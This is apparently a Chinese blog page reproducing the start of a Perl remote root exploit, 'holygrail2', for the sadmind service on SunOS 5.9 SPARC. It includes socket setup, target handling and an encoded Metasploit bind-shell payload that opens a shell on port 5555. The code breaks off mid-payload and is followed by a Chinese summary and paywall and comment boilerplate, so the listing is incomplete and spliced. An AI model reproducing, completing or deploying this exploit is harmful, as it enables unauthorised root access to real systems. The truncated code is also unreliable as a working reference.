#!/usr/bin/perl
# holygrail2 #
#---------------------------------------------------------------------------------#
# SunOS 5.9 [UltraSPARC] sadmind Remote Root Exploit by KingCope in 2008 #
# #
# Most of work was shamelessy ripped from HD-Moore and RISE-Security exploits!!! #
# Bug found by RISE-Security. #
# Sparc exploit by KingCope [kcope2@googlemail.com] #
# Maybe I will extend this to Solaris 8/10/11 in futura ?? #
# thanks to alex,andi,adize ... #
# #
###################################################################################
use strict;
use POSIX;
use IO::Socket;
use IO::Select;
print "holygrail2 vs. SunOS 5.9 sadmind/nby kcope in 2008/nbinds a shell to port 5555/n";
my $host = $ARGV[0];
if ($host eq "") {
print "usage: perl holygrail2.pl <address>/n";
exit(-1);
}
# solaris_sparc_bind - LPORT=5555 Size=232 Encoder=Sparc http://metasploit.com
my $payload =
"/x23/x32/xde/xd7/xa2/x14/x62/x6f/x20/xbf/xff/xff/x20/xbf/xff/xff".
"/x7f/xff/xff/xff/xea/x03/xe0/x20/xaa/x9d/x40/x11/xea/x23/xe0/x20".
"/xa2/x04/x40/x15/x81/xdb/xe0/x20/x12/xbf/xff/xfb/x9e/x03/xe0/x04".
"/x57/x50/xfe/x68/xff/xb6/xde/x77/x69/xad/xde/x7c/x01/xcb/x1e/x89".
"/xbb/xfc/xbe/x8f/x2b/xec/x9e/x8d/xce/x1c/xfe/x77/x5f/xcc/xdf/x7f".
"/x8f/xce/xa0/x87/x11/x10/xdf/xf2/xf1/x04/xfe/x4f/x11/x06/xbe/x5f".
"/x11/x6b/x7e/x6b/x03/x4f/x21/x83/xb7/x80/x01/xb3/x35/xb0/x61/x5b".
"/xa8/x60/x42/x93/x1b/x83/x3d/x5b/x09/x94/x62/x9a/xaf/x84/x42/x75".
"/x3e/x74/xa3/x8d/x91/x77/x1c/x75/x83/x62/x23/x8c/x37/x80/xe3/x87".
"/xb5/xb4/xc3/x7d/x28/x65/x24/x89/x9b/xa6/x9b/x71/x8f/xb8/xc4/x82".
"/x3d/xa9/x24/x8d/xd5/x6b/x84/x8c/x54/x7b/xe4/xb0/xc9/x
这是一个由KingCope在2008年编写的针对SunOS 5.9 [UltraSPARC]的sadmind远程Root权限漏洞利用脚本。它从HD-Moore和RISE-Security的漏洞利用中获取灵感,通过Perl实现,能够绑定到端口5555,提供shell访问。该脚本可能在未来扩展以支持Solaris 8/10/11。
最低0.47元/天 解锁文章
扫一扫
4578
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
